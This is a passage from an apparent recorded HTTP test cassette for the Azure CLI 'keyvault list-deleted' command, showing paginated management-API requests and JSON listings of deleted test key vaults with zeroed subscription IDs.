10:23:32 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - dfe5d94c-37cf-43ea-a905-cf3966e54e9f - ea9bb44c-0c38-462d-97c1-aa1a5f9a096c status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=1ZDdioJAAIXfRZa9WtNR2zKIxZoRapsRpxmjS3%2FGUkvDmcqM3n2lt1g4Nx8czoHvqdWiU5uirqQ2e2o7tGV8q820o1IXOTOMc1zHB3EWtRrF%2FbUVo7Q5G%2FKayLQtLqpoammYCci%2FnQnQQZKbupNlsR6L1NbTxLUmVm66Y9c0Lm1zKzLRSgMXadvIJlejX%2FGI4utJGZk4CSWyN8if%2BFLot6E5jM8tE7i6OQR8fshqeGwqUc95Fe1otGaUU5%2BhiG%2B5G2z4iedwBTA7dAFENukxICztCURmANdTgrAZlutFWEXLgBNEEHIorJyw9MakzHzM9veQ8TuFWPt6e1giwqi3%2Bfc6Hrjf27j3rADyO%2B65E0B%2FSqDXkfLoB2zfYbhYDgzC%2FmBR6COMIhhyPKYVsgO20l6vPw%3D%3D response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/clitestewrcwtvs6ppqw3qhk","name":"clitestewrcwtvs6ppqw3qhk","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rg2ck6agzu7wyebbyoajtmiwaeeqsajvepfgrjy2epdxist4el55pb6ihzywjvtkfoy/providers/Microsoft.KeyVault/vaults/clitestewrcwtvs6ppqw3qhk","location":"westus","tags":{},"deletionDate":"2020-03-13T18:07:26Z","scheduledPurgeDate":"2020-06-11T18:07:26Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-2hbdzcg","name":"cli-test-kv-mgmt-2hbdzcg","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtrkjvnhntlo3glglpoho4znd2njvb6bjmcxfgrppxggi66ihv5s7rq/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-2hbdzcg","location":"westus","tags":{},"deletionDate":"2020-03-11T10:28:43Z","scheduledPurgeDate":"2020-06-09T10:28:43Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-3pagfdx","name":"cli-test-kv-mgmt-3pagfdx","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtfjwnipi7s5eoywdlbua24mu2e2zk43nyqrpa5sc2qrif662senteq/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-3pagfdx","location":"westus","tags":{},"deletionDate":"2020-03-11T10:24:01Z","scheduledPurgeDate":"2020-06-09T10:24:01Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-x34avs2","name":"cli-test-kv-mgmt-x34avs2","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtq44pbpjq7elnn5cig7k5i5rwo3j66zgnfvje34vm35jlw3mobwe63/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-x34avs2","location":"westus","tags":{},"deletionDate":"2020-03-11T10:13:20Z","scheduledPurgeDate":"2020-06-09T10:13:20Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-437ygwc","name":"cli-test-kv-mgmt-437ygwc","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtjk6xofhsidjojgx3zpofm5izs7jkpnngsellushrq5dtaxivdvae5/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-437ygwc","location":"westus","tags":{},"deletionDate":"2020-03-11T07:00:50Z","scheduledPurgeDate":"2020-06-09T07:00:50Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-hthyeagto3cnqm","name":"vault-hthyeagto3cnqm","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_snapshot_a4pfrszmvz5f7ib7haiby6cqtlu4pqq5nrqod/providers/Microsoft.KeyVault/vaults/vault-hthyeagto3cnqm","location":"westcentralus","tags":{},"deletionDate":"2020-01-09T17:14:07Z","scheduledPurgeDate":"2020-04-08T17:14:07Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-gmbouxq4q57ayc","name":"vault-gmbouxq4q57ayc","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_yczlyo3f3sf7v5gy5ehjffev65enoqlbwa/providers/Microsoft.KeyVault/vaults/vault-gmbouxq4q57ayc","location":"westcentralus","tags":{},"deletionDate":"2020-01-09T17:13:52Z","scheduledPurgeDate":"2020-04-08T17:13:52Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-tti6ou2i7wxys6","name":"vault-tti6ou2i7wxys6","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_snapshot_truik5ojfziga2nk5axnfy7cakwelf2g4ru3m/providers/Microsoft.KeyVault/vaults/vault-tti6ou2i7wxys6","location":"westcentralus","tags":{},"deletionDate":"2020-01-09T09:37:46Z","scheduledPurgeDate":"2020-04-08T09:37:46Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-c5zx5oqr4o3iqg","name":"vault-c5zx5oqr4o3iqg","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_snapshot_yy2vzzk3aek5dm4dizzao5kg3drwnsnbyjxql/providers/Microsoft.KeyVault/vaults/vault-c5zx5oqr4o3iqg","location":"westcentralus","tags":{},"deletionDate":"2020-01-09T09:33:23Z","scheduledPurgeDate":"2020-04-08T09:33:23Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-lavv4v5kxzpmmh","name":"vault-lavv4v5kxzpmmh","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_snapshot_wqikruvde7yqcac3r6nwz3esjc44bugltondm/providers/Microsoft.KeyVault/vaults/vault-lavv4v5kxzpmmh","location":"westcentralus","tags":{},"deletionDate":"2020-01-09T09:29:00Z","scheduledPurgeDate":"2020-04-08T09:29:00Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=1ZDRboIwGIXfhSy7GkJRtmFiFmar0dkSasHoHZSiWARD0QjGd1%2fnWyw55%2bIkf%2f6T892NStzaVVFJZYzvxgatWbQ2xsahbc9qbFmnpEr24iSqdpD0l0YMeH2y1CVVvCnObVFXyrJTkL%2bPPoAJ0tw2R1mWmIngQ5OnnvPh5LbnerZ1buprkYlGWbjgTa3qvB38iC5OLmVrZaIUrcieQX0l58K86kv9fOLYwDNtLfD6oqRurKWoJpGMNzReMhrRGUNxtI68YBWVUQ4XALP9LYDYxZDbAfNt0muz8pNKOic978Oj72C4mxOI%2bpDtO4LCjrIDIkfuYkmnRG6NtyeHKSKM%2bqt%2fj6PDenYAtyBg2tAf%2fuEgejJGu5nGobMEBB5mNEIuYWRKj2FHZDikaPmN4cJ4PH4B"}' headers: cache-control: - no-cache content-length: - '6568' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:33 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - e00c2369-8e27-4cfa-b8b8-b07aa464f41c - 78ffcaba-40b0-4fa9-a0c7-b9bc68ec479a status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=1ZDRboIwGIXfhSy7GkJRtmFiFmar0dkSasHoHZSiWARD0QjGd1%2FnWyw55%2BIkf%2F6T892NStzaVVFJZYzvxgatWbQ2xsahbc9qbFmnpEr24iSqdpD0l0YMeH2y1CVVvCnObVFXyrJTkL%2BPPoAJ0tw2R1mWmIngQ5OnnvPh5LbnerZ1buprkYlGWbjgTa3qvB38iC5OLmVrZaIUrcieQX0l58K86kv9fOLYwDNtLfD6oqRurKWoJpGMNzReMhrRGUNxtI68YBWVUQ4XALP9LYDYxZDbAfNt0muz8pNKOic978Oj72C4mxOI%2BpDtO4LCjrIDIkfuYkmnRG6NtyeHKSKM%2Bqt%2Fj6PDenYAtyBg2tAf%2FuEgejJGu5nGobMEBB5mNEIuYWRKj2FHZDikaPmN4cJ4PH4B response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-6x66sj7","name":"cli-test-kv-mgmt-6x66sj7","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtjohfsxs4dmxszimh5evqz2niumbebjdmjty4gg57vue3djocswapv/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-6x66sj7","location":"westus","tags":{},"deletionDate":"2020-03-10T13:51:07Z","scheduledPurgeDate":"2020-06-08T13:51:07Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-se-sd-akfcan","name":"cli-test-kv-se-sd-akfcan","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_secret_soft_deletempafhut33gabboxnut7terzrk7tiso4afyqizoc/providers/Microsoft.KeyVault/vaults/cli-test-kv-se-sd-akfcan","location":"westus","tags":{},"deletionDate":"2020-03-10T13:48:02Z","scheduledPurgeDate":"2020-06-08T13:48:02Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-hxenjlt","name":"cli-test-kv-mgmt-hxenjlt","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt4whef4xs5zjdy7dlxrlivrc2e47ycs3ibg4txlbeyoq2xcqzatxxs/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-hxenjlt","location":"westus","tags":{},"deletionDate":"2020-03-10T12:50:42Z","scheduledPurgeDate":"2020-06-08T12:50:42Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-se-sd-pgswkd","name":"cli-test-kv-se-sd-pgswkd","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_secret_soft_deletea7nsonp6nygh7dfgkx5xuzsg7o2anasgu7vd26n/providers/Microsoft.KeyVault/vaults/cli-test-kv-se-sd-pgswkd","location":"westus","tags":{},"deletionDate":"2020-03-10T12:47:32Z","scheduledPurgeDate":"2020-06-08T12:47:32Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-nipnlln","name":"cli-test-kv-mgmt-nipnlln","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt2ejwkw64uxxt6p7womu5wgrb4tf6vyi4dysp53w654ecroqgzgtxl/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-nipnlln","location":"westus","tags":{},"deletionDate":"2020-03-10T11:02:19Z","scheduledPurgeDate":"2020-06-08T11:02:19Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-tkpfqzy5pmvkxp","name":"vault-tkpfqzy5pmvkxp","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_37c67h2osdhdlwdor7uow2oqaeoe3g4xqs/providers/Microsoft.KeyVault/vaults/vault-tkpfqzy5pmvkxp","location":"westcentralus","tags":{},"deletionDate":"2020-01-09T09:23:26Z","scheduledPurgeDate":"2020-04-08T09:23:26Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-mwgv7utmbt2h5j","name":"vault-mwgv7utmbt2h5j","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_h4hstibsfag43ma4tqnytt7mtiybcvgzxa/providers/Microsoft.KeyVault/vaults/vault-mwgv7utmbt2h5j","location":"westcentralus","tags":{},"deletionDate":"2020-01-09T08:43:58Z","scheduledPurgeDate":"2020-04-08T08:43:58Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-v6diucec3odzab","name":"vault-v6diucec3odzab","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_5n2mt626exizx64ghofabqcw6qpjdnu4hd/providers/Microsoft.KeyVault/vaults/vault-v6diucec3odzab","location":"westcentralus","tags":{},"deletionDate":"2020-01-09T07:33:52Z","scheduledPurgeDate":"2020-04-08T07:33:52Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-cdtpqnenuivoow","name":"vault-cdtpqnenuivoow","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_toptb6alktcbnaim4dcv6x2eyqru55djve3tmijtwvcaav/providers/Microsoft.KeyVault/vaults/vault-cdtpqnenuivoow","location":"westcentralus","tags":{},"deletionDate":"2020-01-07T07:36:30Z","scheduledPurgeDate":"2020-04-06T07:36:30Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-lgqxlozvqvm7qp","name":"vault-lgqxlozvqvm7qp","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_ghrkiwtzwo6lt6hsc47lnlf3s7s3qoiqwzrohk4kdwl2qp/providers/Microsoft.KeyVault/vaults/vault-lgqxlozvqvm7qp","location":"westcentralus","tags":{},"deletionDate":"2020-01-02T11:38:52Z","scheduledPurgeDate":"2020-04-01T11:38:52Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=1ZDfboIwGMXfhSy7GtKibmJiFl3LopMaKsWwO%2f4UhSIQWh1gfPcx32LJuTjn5OT7kt9NK3mrtlkppDa%2faQe899hem2snpWo5N4xzWIZHfualGoX9peGjuDob8hLJuMlqlVWlNEAE09fJG9RhlAJ9kiShHvJ4rMeRZb6ZKbCmFjDqprpmCW%2bk4WRxU8kqVaMv3vnhpVBGwguuePII8j2sM%2f06LIfjCxNASweD4POTFMPHSvBywYR%2foP7Go4zaHvbZnlm7LStYitbQ8Y7tDrmmkwemg0RL0HLq9P7MFd82RcvOyVeY5u7QF5gy%2b5P0AXQBG7veuiU5%2ftkhrL08OHxg4tHl9t%2fj6AhyeuIFJukFIAgP%2fjQj%2bcameN25wh2TPIAErWyaC0hZAAjzbSIoIhj%2f4dPu918%3d"}' headers: cache-control: - no-cache content-length: - '6520' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:35 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - c5f39b68-7c1a-479b-9f1b-95542654aa37 - bfa57643-6f84-4489-abf2-1d7f9d8b7711 status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=1ZDfboIwGMXfhSy7GtKibmJiFl3LopMaKsWwO%2F4UhSIQWh1gfPcx32LJuTjn5OT7kt9NK3mrtlkppDa%2FaQe899hem2snpWo5N4xzWIZHfualGoX9peGjuDob8hLJuMlqlVWlNEAE09fJG9RhlAJ9kiShHvJ4rMeRZb6ZKbCmFjDqprpmCW%2Bk4WRxU8kqVaMv3vnhpVBGwguuePII8j2sM%2F06LIfjCxNASweD4POTFMPHSvBywYR%2FoP7Go4zaHvbZnlm7LStYitbQ8Y7tDrmmkwemg0RL0HLq9P7MFd82RcvOyVeY5u7QF5gy%2B5P0AXQBG7veuiU5%2FtkhrL08OHxg4tHl9t%2Fj6AhyeuIFJukFIAgP%2FjQj%2BcameN25wh2TPIAErWyaC0hZAAjzbSIoIhj%2F4dPu918%3D response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-se-sd-vikhwa","name":"cli-test-kv-se-sd-vikhwa","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_secret_soft_delete4owqf7svkcgnh7lt6eqht43vej2m52r2hqb25c5/providers/Microsoft.KeyVault/vaults/cli-test-kv-se-sd-vikhwa","location":"westus","tags":{},"deletionDate":"2020-03-10T10:59:38Z","scheduledPurgeDate":"2020-06-08T10:59:38Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vaultbk57o","name":"vaultbk57o","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_vmss_encryptionujrtyyinvlz7fxrnico3ylicneszg7ulzutwekddyzmtyb6oqdz/providers/Microsoft.KeyVault/vaults/vaultbk57o","location":"westus","tags":{},"deletionDate":"2020-03-06T20:31:40Z","scheduledPurgeDate":"2020-06-04T20:31:40Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vaultzssly","name":"vaultzssly","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_vm_encryptionmgswffxe7yga7x5ztf5hidfl2jb5akisleyvcjuudyuczrxqw5k5h/providers/Microsoft.KeyVault/vaults/vaultzssly","location":"westus","tags":{},"deletionDate":"2020-03-06T20:27:19Z","scheduledPurgeDate":"2020-06-04T20:27:19Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vmsecretkvdmdhzr7vel","name":"vmsecretkvdmdhzr7vel","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_vm_secrets47d47onu4s4v3tu6imqjh2ls4skuwovzvs2oh2j6y4oa2f67ibsnaunz/providers/Microsoft.KeyVault/vaults/vmsecretkvdmdhzr7vel","location":"westus","tags":{},"deletionDate":"2020-03-06T20:24:37Z","scheduledPurgeDate":"2020-06-04T20:24:37Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vmlinuxkv5vken2wobnx","name":"vmlinuxkv5vken2wobnx","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_vmss_create_linux_secretssxb6l2nvqwnds5zj2rm3lb7mkwe5kdruf7rfr6x5t/providers/Microsoft.KeyVault/vaults/vmlinuxkv5vken2wobnx","location":"westus","tags":{},"deletionDate":"2020-03-06T19:40:34Z","scheduledPurgeDate":"2020-06-04T19:40:34Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/yugangwcu2-kv","name":"yugangwcu2-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/yugangwcu2/providers/Microsoft.KeyVault/vaults/yugangwcu2-kv","location":"westcentralus","tags":{},"deletionDate":"2019-12-31T17:24:36Z","scheduledPurgeDate":"2020-03-30T17:24:36Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/yugangwcu-kv","name":"yugangwcu-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/yugangwcu/providers/Microsoft.KeyVault/vaults/yugangwcu-kv","location":"westcentralus","tags":{},"deletionDate":"2019-12-31T17:24:36Z","scheduledPurgeDate":"2020-03-30T17:24:36Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/yugangwwcu-kv","name":"yugangwwcu-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/yugangwwcu/providers/Microsoft.KeyVault/vaults/yugangwwcu-kv","location":"westcentralus","tags":{},"deletionDate":"2019-12-30T17:14:10Z","scheduledPurgeDate":"2020-03-29T17:14:10Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=1ZDdboIwAIXfhSy7GvLnNjExy7TFzNmSYouROyjFQREIxT%2bM7z7mWyw5N19yck7y3bRKXLp1XkmlTW%2faFm4o22hT7afrGjU1jENcxXtxEFU3ivtjK0a8PhjqmCje5k2X15UyzMTK3sbvlm4lmamP0zTWY8EdnSeu%2fW5npvvqmkbT1qc8Fa0yUM7bWtVZN%2foW1zA%2blp2RilJ0In2A%2boibXD8NzWF8ZpuWq5tDrOcnJYfHWopqxmS4DcIVDVjgURiyDXP9NStZBr4sRPcXH3AH99DGlFi4IDYuVhMM0iWhkUf6co4K7GEAxz5bLQjlNpKkxyACqPcgkjvt5eFhATENPtf%2fXscVA%2bZgwE2fovOgw0JgPiFyd8EFMwkLFwGMIAbEQUCeEQs9DKMlpn%2f9gYHU7vdf"}' headers: cache-control: - no-cache content-length: - '4856' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:35 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - 9b0aa167-900a-4d67-bb6b-4ed3e7aa8f62 - a6d17ef1-3604-42c3-b90f-ab4d3fb9a5dd status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=1ZDdboIwAIXfhSy7GvLnNjExy7TFzNmSYouROyjFQREIxT%2BM7z7mWyw5N19yck7y3bRKXLp1XkmlTW%2FaFm4o22hT7afrGjU1jENcxXtxEFU3ivtjK0a8PhjqmCje5k2X15UyzMTK3sbvlm4lmamP0zTWY8EdnSeu%2FW5npvvqmkbT1qc8Fa0yUM7bWtVZN%2FoW1zA%2Blp2RilJ0In2A%2BoibXD8NzWF8ZpuWq5tDrOcnJYfHWopqxmS4DcIVDVjgURiyDXP9NStZBr4sRPcXH3AH99DGlFi4IDYuVhMM0iWhkUf6co4K7GEAxz5bLQjlNpKkxyACqPcgkjvt5eFhATENPtf%2FXscVA%2BZgwE2fovOgw0JgPiFyd8EFMwkLFwGMIAbEQUCeEQs9DKMlpn%2F9gYHU7vdf response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vmkeyvaultmh5povxqkw","name":"vmkeyvaultmh5povxqkw","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgghszfkagajzrbkkx5izquqtniaos53okqjpafqzlxdifo4lwk3b6qleqgxfrzcdwq/providers/Microsoft.KeyVault/vaults/vmkeyvaultmh5povxqkw","location":"westus","tags":{},"deletionDate":"2020-03-06T19:35:02Z","scheduledPurgeDate":"2020-06-04T19:35:02Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vmlinuxkvb4xfuqwopcn","name":"vmlinuxkvb4xfuqwopcn","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_vm_secretsqlbler57j74pwr72bonmdytdyjqrndfqfqqwtakizcyhbrqpczb2lpf5/providers/Microsoft.KeyVault/vaults/vmlinuxkvb4xfuqwopcn","location":"westus","tags":{},"deletionDate":"2020-03-06T19:32:35Z","scheduledPurgeDate":"2020-06-04T19:32:35Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-keyvault-mvecpw","name":"cli-test-keyvault-mvecpw","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_ag_identitybg2gc5pz4f5bikhulnmlc4esdp4ivci2fdpnyjsrqyau4c3cpsgf4z4/providers/Microsoft.KeyVault/vaults/cli-test-keyvault-mvecpw","location":"westus","tags":{},"deletionDate":"2020-03-06T19:24:21Z","scheduledPurgeDate":"2020-06-04T19:24:21Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/sfrp-cli-kv-fsgnpeycicld","name":"sfrp-cli-kv-fsgnpeycicld","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000